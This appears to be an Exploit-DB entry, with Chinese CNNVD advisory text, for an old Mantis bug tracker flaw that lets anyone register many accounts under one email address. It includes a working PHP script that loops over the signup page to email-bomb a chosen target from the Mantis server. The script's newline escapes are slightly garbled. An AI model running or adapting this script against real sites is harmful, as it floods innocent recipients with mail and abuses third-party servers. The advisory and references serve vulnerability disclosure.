https://www.exploit-db.com/exploits/24392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-209

Mantisbugtracker的signup_page.php存在漏洞。远程攻击者通过创建多个用户和提供相同电子邮件地址来发送电子邮件炸弹。

source: http://www.securityfocus.com/bid/10995/info

Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks.

When a new user signs up to Mantis, the system automatically sends an email message to the given email address. This email contains the users new password for the affected Mantis bug tracking system.

Mantis fails to ensure that only one account exists with the specified email address, and therefor an attacker can create a massive amount of email, directed at any target they wish. This email will originate from the Mantis server, and not the attacker.

The vendor has implemented a captcha system for new account signup requests in the CVS version of the software. All currently released versions of the software are reported vulnerable. 

<?php

//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://www.example.com";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $in");
$user = "$base_user$i";
echo("New user is $usern");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $urln");
$fd = fopen($url,"r");
echo("E-mail $i sendedn");
fclose($fd);
}

?>

来源:XF
名称:mantis-improper-account-validation(17093)
链接:http://xforce.iss.net/xforce/xfdb/17093
来源:BID
名称:10995
链接:http://www.securityfocus.com/bid/10995
来源:BUGTRAQ
名称:20040820MultipleVulnerabilitiesinMantisBugtracker
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109312225727345&w;=2